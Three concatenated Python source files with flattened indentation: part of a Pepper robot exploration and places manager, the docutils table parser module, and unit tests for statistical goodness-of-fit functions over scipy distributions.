places_loaded = "name" in self.current_places and "places" in self.current_places
except:
return False
return places_loaded
def isLocalized(self):
try:
self.nav.getRobotPositionInMap()
return True
except:
return False
def getPlaces(self):
if self.current_places == None:
self.logger.warning("No places loaded")
return None
return self.current_places["places"]
def getPlaceLocation(self, label):
if self.current_places == None:
self.logger.warning("No places loaded")
return None
if label in self.current_places["places"]:
return self.current_places["places"][label]
return None
def resetPlacesCallback(self, useless):
self.resetPlaces()
def resetPlaces(self):
self.current_places["places"] = {}
self.publishLabels()
def loadExploration(self, name):
explo_path = qi.path.findData(self.explorer_application_name, name + self.explo_extension, False)
if len(explo_path) > 0:
try:
if not(self.nav.loadExploration(explo_path)):
return False
self.current_places = {}
self.current_places["name"] = name
self.current_places["places"] = {}
except Exception as e:
self.logger.error("Unable to load explo: " + str(e))
return False
return True
self.logger.error("No such explo file: " + name)
return False
def loadPlaces(self, name):
self.logger.info("load places")
available_explo = qi.path.findData(self.application_name, name + self.places_extension, False)
if len(available_explo) > 0:
#load an existing annotated explo
in_file = open(available_explo, "rb")
data = pickle.load(in_file)
in_file.close()
if not("name" in data) or not("places" in data):
self.logger.error("wrong annoted explo format")
return False
self.current_places = data
explo_path = qi.path.findData(self.explorer_application_name, name + self.explo_extension, False)
if len(explo_path) > 0:
try:
self.nav.loadExploration(explo_path)
except Exception as e:
self.logger.warning("Unable to load places: " + str(e))
return False
else:
return False
elif not(self.loadExploration(name)):
return False
self.showPlaces()
return True
def savePlacesCallback(self, useless):
self.savePlaces()
def savePlaces(self):
if self.current_places == None:
self.logger.warning("No places loaded")
return None
path = qi.path.userWritableDataPath(self.application_name, self.current_places["name"] + self.places_extension)
out_file = open(path, "wb")
self.logger.info("places to save: " + str(self.current_places))
pickle.dump(self.current_places, out_file)
out_file.close()
self.logger.info("places saved to : " + path)
return path
def getAvailableExplorations(self):
data = qi.path.listData(self.explorer_application_name, "*" + self.explo_extension)
return self.getBasenameList(data)
def getAvailablePlaces(self):
data = qi.path.listData(self.application_name, "*" + self.places_extension)
return self.getBasenameList(data)
def getBasenameList(self, data):
result = []
for path in data:
basename = os.path.basename(path)
result.append(basename[:len(basename) - 6])
return result
def addPlaceCallback(self, place):
pt = self.occMap.getPositionFromPixel(Point2Di(place[0][0], place[0][1]))
label = place[1]
self.addPlace(label, [pt.x, pt.y])
def addPlace(self, label, position):
if self.current_places == None:
self.logger.warning("No places loaded")
return None
self.logger.info("adding " + label)
self.current_places["places"][label] = position
self.publishLabels()
def showWebPage(self):
appName = self.packageUid
if self.tabletService.loadApplication(appName):
self.logger.info("Successfully set application: %s" % appName)
self.tabletService.showWebview()
time.sleep(4)
return True
else:
self.logger.warning("Got tablet service, but failed to set application: %s" % appName)
return False
def publishLabels(self):
if self.current_places == None:
self.logger.warning("No places loaded")
return None
place_list = []
for place in self.current_places["places"]:
current_place = self.current_places["places"][place]
pos = self.occMap.getPixelFromPosition(m.Position2D(current_place[0], current_place[1]))
place_list.append([[pos.x, pos.y], place])
self.memory.raiseEvent(self.events["places"], place_list)
def showPlaces(self):
self.publishMap()
self.publishLabels()
def publishMap(self):
if self.current_places == None:
self.logger.warning("No places loaded")
return None
# Get the map from navigation.
map = self.nav.getMetricalMap()
mpp = map[0]
size = map[1]
originOffset = m.Position2D(map[3])
data = map[4]
# Fit the size of the image
img = np.array(data, np.uint8).reshape(size, size, 1)
img = (100 - img) * 2.5
img = img.transpose((1, 0, 2)) # Do not transpose the channels.
tabletSize = 736
img = cv2.resize(img, (tabletSize, tabletSize))
mpp = size * mpp / tabletSize
size = tabletSize
#convert to color
cv_img = img.astype(np.uint8)
color_img = cv2.cvtColor(cv_img, cv2.COLOR_GRAY2RGB)
self.occMap = OccupancyMapParams(size, mpp, originOffset)
self.occMap.originOffset = originOffset
# png
flag, buff = cv2.imencode(".png", color_img)
# base 64
buff64 = base64.b64encode(buff)
full = "data:image/png;base64," + buff64
# show app
self.memory.raiseEvent(self.events["metricalMap"], [mpp, size, map[3], full])
def getOccupancyMapParams(self):
return [self.occMap.size, self.occMap.metersPerPixel, self.occMap.originOffset.toVector()]
if __name__ == "__main__":
app = qi.Application(sys.argv)
app.start()
session = app.session
#get the logs
mod = qi.module("qicore")
provider = mod.initializeLogging(app.session)
# don't forget to check that the services you use are ready!
for required_service in ["ALMemory", "ALNavigation", "ALTabletService"]:
future = session.waitForService(required_service)
if future is not None:
future.wait()
my_service = ExplorationManager(session)
register_id = session.registerService("ExplorationManager", my_service)
app.run()
|
|
# $Id: tableparser.py 7320 2012-01-19 22:33:02Z milde $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
This module defines table parser classes,which parse plaintext-graphic tables
and produce a well-formed data structure suitable for building a CALS table.
:Classes:
- `GridTableParser`: Parse fully-formed tables represented with a grid.
- `SimpleTableParser`: Parse simple tables, delimited by top & bottom
borders.
:Exception class: `TableMarkupError`
:Function:
`update_dict_of_lists()`: Merge two dictionaries containing list values.
"""
__docformat__ = 'reStructuredText'
import re
import sys
from docutils import DataError
from docutils.utils import strip_combining_chars
class TableMarkupError(DataError):
"""
Raise if there is any problem with table markup.
The keyword argument `offset` denotes the offset of the problem
from the table's start line.
"""
def __init__(self, *args, **kwargs):
self.offset = kwargs.pop('offset', 0)
DataError.__init__(self, *args)
class TableParser:
"""
Abstract superclass for the common parts of the syntax-specific parsers.
"""
head_body_separator_pat = None
"""Matches the row separator between head rows and body rows."""
double_width_pad_char = '\x00'
"""Padding character for East Asian double-width text."""
def parse(self, block):
"""
Analyze the text `block` and return a table data structure.
Given a plaintext-graphic table in `block` (list of lines of text; no
whitespace padding), parse the table, construct and return the data
necessary to construct a CALS table or equivalent.
Raise `TableMarkupError` if there is any problem with the markup.
"""
self.setup(block)
self.find_head_body_sep()
self.parse_table()
structure = self.structure_from_cells()
return structure
def find_head_body_sep(self):
"""Look for a head/body row separator line; store the line index."""
for i in range(len(self.block)):
line = self.block[i]
if self.head_body_separator_pat.match(line):
if self.head_body_sep:
raise TableMarkupError(
'Multiple head/body row separators '
'(table lines %s and %s); only one allowed.'
% (self.head_body_sep+1, i+1), offset=i)
else:
self.head_body_sep = i
self.block[i] = line.replace('=', '-')
if self.head_body_sep == 0 or self.head_body_sep == (len(self.block)
- 1):
raise TableMarkupError('The head/body row separator may not be '
'the first or last line of the table.',
offset=i)
class GridTableParser(TableParser):
"""
Parse a grid table using `parse()`.
Here's an example of a grid table::
+------------------------+------------+----------+----------+
| Header row, column 1 | Header 2 | Header 3 | Header 4 |
+========================+============+==========+==========+
| body row 1, column 1 | column 2 | column 3 | column 4 |
+------------------------+------------+----------+----------+
| body row 2 | Cells may span columns. |
+------------------------+------------+---------------------+
| body row 3 | Cells may | - Table cells |
+------------------------+ span rows. | - contain |
| body row 4 | | - body elements. |
+------------------------+------------+---------------------+
Intersections use '+', row separators use '-' (except for one optional
head/body row separator, which uses '='), and column separators use '|'.
Passing the above table to the `parse()` method will result in the
following data structure::
([24, 12, 10, 10],
[[(0, 0, 1, ['Header row, column 1']),
(0, 0, 1, ['Header 2']),
(0, 0, 1, ['Header 3']),
(0, 0, 1, ['Header 4'])]],
[[(0, 0, 3, ['body row 1, column 1']),
(0, 0, 3, ['column 2']),
(0, 0, 3, ['column 3']),
(0, 0, 3, ['column 4'])],
[(0, 0, 5, ['body row 2']),
(0, 2, 5, ['Cells may span columns.']),
None,
None],
[(0, 0, 7, ['body row 3']),
(1, 0, 7, ['Cells may', 'span rows.', '']),
(1, 1, 7, ['- Table cells', '- contain', '- body elements.']),
None],
[(0, 0, 9, ['body row 4']), None, None, None]])
The first item is a list containing column widths (colspecs). The second
item is a list of head rows, and the third is a list of body rows. Each
row contains a list of cells. Each cell is either None (for a cell unused
because of another cell's span), or a tuple. A cell tuple contains four
items: the number of extra rows used by the cell in a vertical span
(morerows); the number of extra columns used by the cell in a horizontal
span (morecols); the line offset of the first line of the cell contents;
and the cell contents, a list of lines of text.
"""
head_body_separator_pat = re.compile(r'\+=[=+]+=\+ *$')
def setup(self, block):
self.block = block[:] # make a copy; it may be modified
self.block.disconnect() # don't propagate changes to parent
self.bottom = len(block) - 1
self.right = len(block[0]) - 1
self.head_body_sep = None
self.done = [-1] * len(block[0])
self.cells = []
self.rowseps = {0: [0]}
self.colseps = {0: [0]}
def parse_table(self):
"""
Start with a queue of upper-left corners, containing the upper-left
corner of the table itself. Trace out one rectangular cell, remember
it, and add its upper-right and lower-left corners to the queue of
potential upper-left corners of further cells. Process the queue in
top-to-bottom order, keeping track of how much of each text column has
been seen.
We'll end up knowing all the row and column boundaries, cell positions
and their dimensions.
"""
corners = [(0, 0)]
while corners:
top, left = corners.pop(0)
if top == self.bottom or left == self.right \
or top <= self.done[left]:
continue
result = self.scan_cell(top, left)
if not result:
continue
bottom, right, rowseps, colseps = result
update_dict_of_lists(self.rowseps, rowseps)
update_dict_of_lists(self.colseps, colseps)
self.mark_done(top, left, bottom, right)
cellblock = self.block.get_2D_block(top + 1, left + 1,
bottom, right)
cellblock.disconnect() # lines in cell can't sync with parent
cellblock.replace(self.double_width_pad_char, '')
self.cells.append((top, left, bottom, right, cellblock))
corners.extend([(top, right), (bottom, left)])
corners.sort()
if not self.check_parse_complete():
raise TableMarkupError('Malformed table; parse incomplete.')
def mark_done(self, top, left, bottom, right):
"""For keeping track of how much of each text column has been seen."""
before = top - 1
after = bottom - 1
for col in range(left, right):
assert self.done[col] == before
self.done[col] = after
def check_parse_complete(self):
"""Each text column should have been completely seen."""
last = self.bottom - 1
for col in range(self.right):
if self.done[col] != last:
return False
return True
def scan_cell(self, top, left):
"""Starting at the top-left corner, start tracing out a cell."""
assert self.block[top][left] == '+'
result = self.scan_right(top, left)
return result
def scan_right(self, top, left):
"""
Look for the top-right corner of the cell, and make note of all column
boundaries ('+').
"""
colseps = {}
line = self.block[top]
for i in range(left + 1, self.right + 1):
if line[i] == '+':
colseps[i] = [top]
result = self.scan_down(top, left, i)
if result:
bottom, rowseps, newcolseps = result
update_dict_of_lists(colseps, newcolseps)
return bottom, i, rowseps, colseps
elif line[i] != '-':
return None
return None
def scan_down(self, top, left, right):
"""
Look for the bottom-right corner of the cell, making note of all row
boundaries.
"""
rowseps = {}
for i in range(top + 1, self.bottom + 1):
if self.block[i][right] == '+':
rowseps[i] = [right]
result = self.scan_left(top, left, i, right)
if result:
newrowseps, colseps = result
update_dict_of_lists(rowseps, newrowseps)
return i, rowseps, colseps
elif self.block[i][right] != '|':
return None
return None
def scan_left(self, top, left, bottom, right):
"""
Noting column boundaries, look for the bottom-left corner of the cell.
It must line up with the starting point.
"""
colseps = {}
line = self.block[bottom]
for i in range(right - 1, left, -1):
if line[i] == '+':
colseps[i] = [bottom]
elif line[i] != '-':
return None
if line[left] != '+':
return None
result = self.scan_up(top, left, bottom, right)
if result is not None:
rowseps = result
return rowseps, colseps
return None
def scan_up(self, top, left, bottom, right):
"""
Noting row boundaries, see if we can return to the starting point.
"""
rowseps = {}
for i in range(bottom - 1, top, -1):
if self.block[i][left] == '+':
rowseps[i] = [left]
elif self.block[i][left] != '|':
return None
return rowseps
def structure_from_cells(self):
"""
From the data collected by `scan_cell()`, convert to the final data
structure.
"""
rowseps = list(self.rowseps.keys()) # list of row boundaries
rowseps.sort()
rowindex = {}
for i in range(len(rowseps)):
rowindex[rowseps[i]] = i # row boundary -> row number mapping
colseps = list(self.colseps.keys()) # list of column boundaries
colseps.sort()
colindex = {}
for i in range(len(colseps)):
colindex[colseps[i]] = i # column boundary -> col number map
colspecs = [(colseps[i] - colseps[i - 1] - 1)
for i in range(1, len(colseps))] # list of column widths
# prepare an empty table with the correct number of rows & columns
onerow = [None for i in range(len(colseps) - 1)]
rows = [onerow[:] for i in range(len(rowseps) - 1)]
# keep track of # of cells remaining; should reduce to zero
remaining = (len(rowseps) - 1) * (len(colseps) - 1)
for top, left, bottom, right, block in self.cells:
rownum = rowindex[top]
colnum = colindex[left]
assert rows[rownum][colnum] is None, (
'Cell (row %s, column %s) already used.'
% (rownum + 1, colnum + 1))
morerows = rowindex[bottom] - rownum - 1
morecols = colindex[right] - colnum - 1
remaining -= (morerows + 1) * (morecols + 1)
# write the cell into the table
rows[rownum][colnum] = (morerows, morecols, top + 1, block)
assert remaining == 0, 'Unused cells remaining.'
if self.head_body_sep: # separate head rows from body rows
numheadrows = rowindex[self.head_body_sep]
headrows = rows[:numheadrows]
bodyrows = rows[numheadrows:]
else:
headrows = []
bodyrows = rows
return (colspecs, headrows, bodyrows)
class SimpleTableParser(TableParser):
"""
Parse a simple table using `parse()`.
Here's an example of a simple table::
===== =====
col 1 col 2
===== =====
1 Second column of row 1.
2 Second column of row 2.
Second line of paragraph.
3 - Second column of row 3.
- Second item in bullet
list (row 3, column 2).
4 is a span
------------
5
===== =====
Top and bottom borders use '=', column span underlines use '-', column
separation is indicated with spaces.
Passing the above table to the `parse()` method will result in the
following data structure, whose interpretation is the same as for
`GridTableParser`::
([5, 25],
[[(0, 0, 1, ['col 1']),
(0, 0, 1, ['col 2'])]],
[[(0, 0, 3, ['1']),
(0, 0, 3, ['Second column of row 1.'])],
[(0, 0, 4, ['2']),
(0, 0, 4, ['Second column of row 2.',
'Second line of paragraph.'])],
[(0, 0, 6, ['3']),
(0, 0, 6, ['- Second column of row 3.',
'',
'- Second item in bullet',
' list (row 3, column 2).'])],
[(0, 1, 10, ['4 is a span'])],
[(0, 0, 12, ['5']),
(0, 0, 12, [''])]])
"""
head_body_separator_pat = re.compile('=[ =]*$')
span_pat = re.compile('-[ -]*$')
def setup(self, block):
self.block = block[:] # make a copy; it will be modified
self.block.disconnect() # don't propagate changes to parent
# Convert top & bottom borders to column span underlines:
self.block[0] = self.block[0].replace('=', '-')
self.block[-1] = self.block[-1].replace('=', '-')
self.head_body_sep = None
self.columns = []
self.border_end = None
self.table = []
self.done = [-1] * len(block[0])
self.rowseps = {0: [0]}
self.colseps = {0: [0]}
def parse_table(self):
"""
First determine the column boundaries from the top border, then
process rows. Each row may consist of multiple lines; accumulate
lines until a row is complete. Call `self.parse_row` to finish the
job.
"""
# Top border must fully describe all table columns.
self.columns = self.parse_columns(self.block[0], 0)
self.border_end = self.columns[-1][1]
firststart, firstend = self.columns[0]
offset = 1 # skip top border
start = 1
text_found = None
while offset < len(self.block):
line = self.block[offset]
if self.span_pat.match(line):
# Column span underline or border; row is complete.
self.parse_row(self.block[start:offset], start,
(line.rstrip(), offset))
start = offset + 1
text_found = None
elif line[firststart:firstend].strip():
# First column not blank, therefore it's a new row.
if text_found and offset != start:
self.parse_row(self.block[start:offset], start)
start = offset
text_found = 1
elif not text_found:
start = offset + 1
offset += 1
def parse_columns(self, line, offset):
"""
Given a column span underline, return a list of (begin, end) pairs.
"""
cols = []
end = 0
while True:
begin = line.find('-', end)
end = line.find(' ', begin)
if begin < 0:
break
if end < 0:
end = len(line)
cols.append((begin, end))
if self.columns:
if cols[-1][1] != self.border_end:
raise TableMarkupError('Column span incomplete in table '
'line %s.' % (offset+1),
offset=offset)
# Allow for an unbounded rightmost column:
cols[-1] = (cols[-1][0], self.columns[-1][1])
return cols
def init_row(self, colspec, offset):
i = 0
cells = []
for start, end in colspec:
morecols = 0
try:
assert start == self.columns[i][0]
while end != self.columns[i][1]:
i += 1
morecols += 1
except (AssertionError, IndexError):
raise TableMarkupError('Column span alignment problem '
'in table line %s.' % (offset+2),
offset=offset+1)
cells.append([0, morecols, offset, []])
i += 1
return cells
def parse_row(self, lines, start, spanline=None):
"""
Given the text `lines` of a row, parse it and append to `self.table`.
The row is parsed according to the current column spec (either
`spanline` if provided or `self.columns`). For each column, extract
text from each line, and check for text in column margins. Finally,
adjust for insignificant whitespace.
"""
if not (lines or spanline):
# No new row, just blank lines.
return
if spanline:
columns = self.parse_columns(*spanline)
span_offset = spanline[1]
else:
columns = self.columns[:]
span_offset = start
self.check_columns(lines, start, columns)
row = self.init_row(columns, start)
for i in range(len(columns)):
start, end = columns[i]
cellblock = lines.get_2D_block(0, start, len(lines), end)
cellblock.disconnect() # lines in cell can't sync with parent
cellblock.replace(self.double_width_pad_char, '')
row[i][3] = cellblock
self.table.append(row)
def check_columns(self, lines, first_line, columns):
"""
Check for text in column margins and text overflow in the last column.
Raise TableMarkupError if anything but whitespace is in column margins.
Adjust the end value for the last column if there is text overflow.
"""
# "Infinite" value for a dummy last column's beginning, used to
# check for text overflow:
columns.append((sys.maxsize, None))
lastcol = len(columns) - 2
# combining characters do not contribute to the column width
lines = [strip_combining_chars(line) for line in lines]
for i in range(len(columns) - 1):
start, end = columns[i]
nextstart = columns[i+1][0]
offset = 0
for line in lines:
if i == lastcol and line[end:].strip():
text = line[start:].rstrip()
new_end = start + len(text)
columns[i] = (start, new_end)
main_start, main_end = self.columns[-1]
if new_end > main_end:
self.columns[-1] = (main_start, new_end)
elif line[end:nextstart].strip():
raise TableMarkupError('Text in column margin '
'in table line %s.' % (first_line+offset+1),
offset=first_line+offset)
offset += 1
columns.pop()
def structure_from_cells(self):
colspecs = [end - start for start, end in self.columns]
first_body_row = 0
if self.head_body_sep:
for i in range(len(self.table)):
if self.table[i][0][2] > self.head_body_sep:
first_body_row = i
break
return (colspecs, self.table[:first_body_row],
self.table[first_body_row:])
def update_dict_of_lists(master, newdata):
"""
Extend the list values of `master` with those from `newdata`.
Both parameters must be dictionaries containing list values.
"""
for key, values in list(newdata.items()):
master.setdefault(key, []).extend(values)
|
|
# Copyright (c) 2014, Salesforce.com, Inc. All rights reserved.
# Copyright (c) 2015, Gamelan Labs, Inc.
# Copyright (c) 2016, Google, Inc.
# Copyright (c) 2016, Gamelan Labs, Inc.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# - Neither the name of Salesforce.com nor the names of its contributors
# may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division
try:
from itertools import izip as zip
except ImportError:
pass
from itertools import product
import random
from unittest import skip
from unittest import TestCase
import numpy
import scipy.stats
from numpy import pi
from numpy.testing import rand
from goftests import get_dim
from goftests import multinomial_goodness_of_fit
from goftests import discrete_goodness_of_fit
from goftests import auto_density_goodness_of_fit
from goftests import mixed_density_goodness_of_fit
from goftests import split_discrete_continuous
from goftests import volume_of_sphere
from goftests import chi2sf
NUM_BASE_SAMPLES = 250
NUM_SAMPLES_SCALE = 1000
TEST_FAILURE_RATE = 5e-4
class TestMultinomialGoodnessOfFit(TestCase):
def test_multinomial_goodness_of_fit(self):
random.seed(0)
numpy.random.seed(0)
for dim in range(2, 20):
sample_count = int(1e5)
probs = numpy.random.dirichlet([1] * dim)
counts = numpy.random.multinomial(sample_count, probs)
p_good = multinomial_goodness_of_fit(probs, counts, sample_count)
self.assertGreater(p_good, TEST_FAILURE_RATE)
unif = [1 / dim] * dim
unif_counts = numpy.random.multinomial(sample_count, unif)
p_bad = multinomial_goodness_of_fit(probs, unif_counts,
sample_count)
self.assertLess(p_bad, TEST_FAILURE_RATE)
class TestVolumeOfSphere(TestCase):
def test_volume_of_sphere(self):
for r in [0.1, 1.0, 10.0]:
self.assertAlmostEqual(volume_of_sphere(1, r), 2 * r)
self.assertAlmostEqual(volume_of_sphere(2, r), pi * r ** 2)
self.assertAlmostEqual(volume_of_sphere(3, r), 4 / 3 * pi * r ** 3)
SPLIT_EXAMPLES = [
(False, False, []),
(0, 0, []),
('abc', 'abc', []),
(0.0, None, [0.0]),
((), (), []),
([], (), []),
((0, ), (0, ), []),
([0], (0, ), []),
((0.0, ), (None, ), [0.0]),
([0.0], (None, ), [0.0]),
([True, 1, 'xyz', 3.14, [None, (), ([2.71],)]],
(True, 1, 'xyz', None, (None, (), ((None,),))),
[3.14, 2.71]),
(numpy.zeros(3), (None, None, None), [0.0, 0.0, 0.0]),
]
class TestSplitDiscreteContinuous(TestCase):
def test_split_continuous_discrete(self):
for mixed, discrete, continuous in SPLIT_EXAMPLES:
d, c = split_discrete_continuous(mixed)
self.assertEqual(d, discrete)
self.assertAlmostEqual(c, continuous)
class TestChi2CDF(TestCase):
def test_chi2cdf(self):
xlist = numpy.linspace(0, 100, 500)
slist = numpy.arange(1, 41, 1.5)
for s, x in product(slist, xlist):
self.assertAlmostEqual(scipy.stats.chi2.sf(x, s), chi2sf(x, s))
class DistributionTestBase(object):
"""Abstract base class for probability distribution unit tests.
This class supplies two test methods, :meth:`.test_goodness_of_fit`
and :meth:`.test_mixed_density_goodness_of_fit` for testing the
goodness of fit functions.
Subclasses must override and implement one class attribute and two
instance methods. The :attr:`.dist` class attribute must be set to
one of SciPy probability distribution constructors in
:mod:`scipy.stats`. The :meth:`.goodness_of_fit` method must return
the result of calling one of the goodness of fit functions being
tested. The :meth:`.probabilites` method must return an object
representing the probabilities for each sample; the output depends
on the format of the inputs to the :meth:`.goodness_of_fit` method.
Subclasses may also set the :attr:`.params` attribute, which is a
list of tuples that will be provided as arguments to the underlying
SciPy distribution constructor as specified in :attr:`.dist`. If not
specified, random arguments will be provided.
If samples drawn from :attr:`.dist` must be modified in some way
before the PDF or PMF can be computed, then subclasses may override
the :meth:`._sample_postprocessing` method.
"""
#: The SciPy distribution constructor to test.
dist = None
#: An optional list of arguments to the distribution constructor.
#:
#: Each tuple in this list will be provided as the positional
#: arguments to the distribution constructor specified in
#: :attr:`.dist`. If not specified, random arguments will be
#: provided.
params = None
def setUp(self):
random.seed(0)
numpy.random.seed(0)
def _sample_postprocessing(self, sample):
"""Modify a sample drawn from the distribution.
This method returns a modified version of `sample`, but that
modification may be arbitrary. This modified sample is the one
for which the PDF and the goodness-of-fit are computed.
By default, this is a no-op, but subclasses may wish to override
this method to modify sample in some way.
"""
return sample
def dist_params(self):
# If there are no parameters, then we provide a random one.
if self.params is None:
params = [tuple(1 + rand(self.dist.numargs))]
else:
params = self.params
return params
def test_mixed_density_goodness_of_fit(self):
for param in self.dist_params():
dim = get_dim(self.dist.rvs(*param, size=2)[0])
sample_count = NUM_BASE_SAMPLES + NUM_SAMPLES_SCALE * dim
samples = self.dist.rvs(*param, size=sample_count)
samples = list(map(self._sample_postprocessing, samples))
probabilities = [self.pdf(sample, *param) for sample in samples]
gof = mixed_density_goodness_of_fit(samples, probabilities)
self.assertGreater(gof, TEST_FAILURE_RATE)
def test_good_fit(self):
for param in self.dist_params():
dim = get_dim(self.dist.rvs(*param, size=2)[0])
sample_count = NUM_BASE_SAMPLES + NUM_SAMPLES_SCALE * dim
samples = self.dist.rvs(*param, size=sample_count)
samples = list(map(self._sample_postprocessing, samples))
probabilities = [self.pdf(sample, *param) for sample in samples]
gof = self.goodness_of_fit(samples, probabilities)
self.assertGreater(gof, TEST_FAILURE_RATE)
def goodness_of_fit(self, samples, probabilities):
raise NotImplementedError
class ContinuousTestBase(DistributionTestBase):
"""Abstract base class for testing continuous probability distributions.
Concrete subclasses must set the :attr:`.dist` attribute to be the
constructor for a continuous probability distribution.
"""
def goodness_of_fit(self, samples, probabilities):
gof = auto_density_goodness_of_fit(samples, probabilities)
return gof
def pdf(self, *args, **kw):
return self.dist.pdf(*args, **kw)
class DiscreteTestBase(DistributionTestBase):
"""Abstract base class for testing discrete probability distributions.
Concrete subclasses must set the :attr:`.dist` attribute to be the
constructor for a discrete probability distribution.
"""
def goodness_of_fit(self, samples, probabilities):
probs_dict = dict(zip(samples, probabilities))
gof = discrete_goodness_of_fit(samples, probs_dict)
return gof
def pdf(self, *args, **kw):
return self.dist.pmf(*args, **kw)
#
# Multivariate probability distributions.
#
class TestMultivariateNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.multivariate_normal
params = [
(numpy.ones(1), numpy.eye(1)),
(numpy.ones(2), numpy.eye(2)),
(numpy.ones(3), numpy.eye(3)),
]
class TestDirichlet(ContinuousTestBase, TestCase):
dist = scipy.stats.dirichlet
params = [
([2.0, 2.5],),
([2.0, 2.5, 3.0],),
([2.0, 2.5, 3.0, 3.5],),
]
def _sample_postprocessing(self, value):
"""Project onto all but the last dimension."""
return value[:-1]
#
# Discrete probability distributions.
#
class TestBernoulli(DiscreteTestBase, TestCase):
dist = scipy.stats.bernoulli
params = [(0.2, )]
class TestBinomial(DiscreteTestBase, TestCase):
dist = scipy.stats.binom
params = [(40, 0.4)]
@skip('')
class TestBoltzmann(DiscreteTestBase, TestCase):
dist = scipy.stats.boltzmann
class TestDiscreteLaplacian(DiscreteTestBase, TestCase):
dist = scipy.stats.dlaplace
params = [(0.8, )]
class TestGeometric(DiscreteTestBase, TestCase):
dist = scipy.stats.geom
params = [(0.1, )]
class TestHypergeometric(DiscreteTestBase, TestCase):
dist = scipy.stats.hypergeom
params = [(40, 14, 24)]
class TestLogSeries(DiscreteTestBase, TestCase):
dist = scipy.stats.logser
params = [(0.9, )]
class TestNegativeBinomial(DiscreteTestBase, TestCase):
dist = scipy.stats.nbinom
params = [(40, 0.4)]
class TestPlanck(DiscreteTestBase, TestCase):
dist = scipy.stats.planck
params = [(0.51, )]
class TestPoisson(DiscreteTestBase, TestCase):
dist = scipy.stats.poisson
params = [(20, )]
@skip('too sparse')
class TestRandInt(DiscreteTestBase, TestCase):
dist = scipy.stats.randint
class TestSkellam(DiscreteTestBase, TestCase):
dist = scipy.stats.skellam
@skip('bug?')
class TestZipf(DiscreteTestBase, TestCase):
dist = scipy.stats.zipf
params = [(1.2, )]
#
# Continuous probability distributions.
#
@skip('')
class TestAlpha(ContinuousTestBase, TestCase):
dist = scipy.stats.alpha
class TestAnglit(ContinuousTestBase, TestCase):
dist = scipy.stats.anglit
class TestArcsine(ContinuousTestBase, TestCase):
dist = scipy.stats.arcsine
class TestBeta(ContinuousTestBase, TestCase):
dist = scipy.stats.beta
params = [
(0.5, 0.5),
(0.5, 1.5),
(0.5, 2.5),
]
class TestBetaPrime(ContinuousTestBase, TestCase):
dist = scipy.stats.betaprime
class TestBradford(ContinuousTestBase, TestCase):
dist = scipy.stats.bradford
class TestBurr(ContinuousTestBase, TestCase):
dist = scipy.stats.burr
class TestCauchy(ContinuousTestBase, TestCase):
dist = scipy.stats.cauchy
class TestChi(ContinuousTestBase, TestCase):
dist = scipy.stats.chi
class TestChiSquared(ContinuousTestBase, TestCase):
dist = scipy.stats.chi2
class TestCosine(ContinuousTestBase, TestCase):
dist = scipy.stats.cosine
class TestDoubleGamma(ContinuousTestBase, TestCase):
dist = scipy.stats.dgamma
class TestDoubleWeibull(ContinuousTestBase, TestCase):
dist = scipy.stats.dweibull
class TestErlang(ContinuousTestBase, TestCase):
dist = scipy.stats.erlang
params = [(7, )]
class TestExponential(ContinuousTestBase, TestCase):
dist = scipy.stats.expon
params = [(7, )]
class TestExponentiallyModifiedNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.exponnorm
class TestExponentiatedWeibull(ContinuousTestBase, TestCase):
dist = scipy.stats.exponweib
class TestExponentialPower(ContinuousTestBase, TestCase):
dist = scipy.stats.exponpow
class TestF(ContinuousTestBase, TestCase):
dist = scipy.stats.f
class TestFatigueLife(ContinuousTestBase, TestCase):
dist = scipy.stats.fatiguelife
class TestFisk(ContinuousTestBase, TestCase):
dist = scipy.stats.fisk
class TestFoldedCauchy(ContinuousTestBase, TestCase):
dist = scipy.stats.foldcauchy
class TestFoldedNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.foldnorm
class TestFrechetRight(ContinuousTestBase, TestCase):
dist = scipy.stats.frechet_r
class TestFrechetLeft(ContinuousTestBase, TestCase):
dist = scipy.stats.frechet_l
class TestGeneralizedLogistic(ContinuousTestBase, TestCase):
dist = scipy.stats.genlogistic
class TestGeneralizedNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.gennorm
class TestGeneralizedPareto(ContinuousTestBase, TestCase):
dist = scipy.stats.genpareto
class TestGeneralizedExponential(ContinuousTestBase, TestCase):
dist = scipy.stats.genexpon
class TestGeneralizedExtreme(ContinuousTestBase, TestCase):
dist = scipy.stats.genextreme
@skip('very slow')
class TestGaussHypergeometric(ContinuousTestBase, TestCase):
dist = scipy.stats.gausshyper
class TestGamma(ContinuousTestBase, TestCase):
dist = scipy.stats.gamma
class TestGeneralizedGamma(ContinuousTestBase, TestCase):
dist = scipy.stats.gengamma
class TestGeneralizedHalfLogistic(ContinuousTestBase, TestCase):
dist = scipy.stats.genhalflogistic
class TestGilbrat(ContinuousTestBase, TestCase):
dist = scipy.stats.gilbrat
class TestGompertz(ContinuousTestBase, TestCase):
dist = scipy.stats.gompertz
class TestGumbelRight(ContinuousTestBase, TestCase):
dist = scipy.stats.gumbel_r
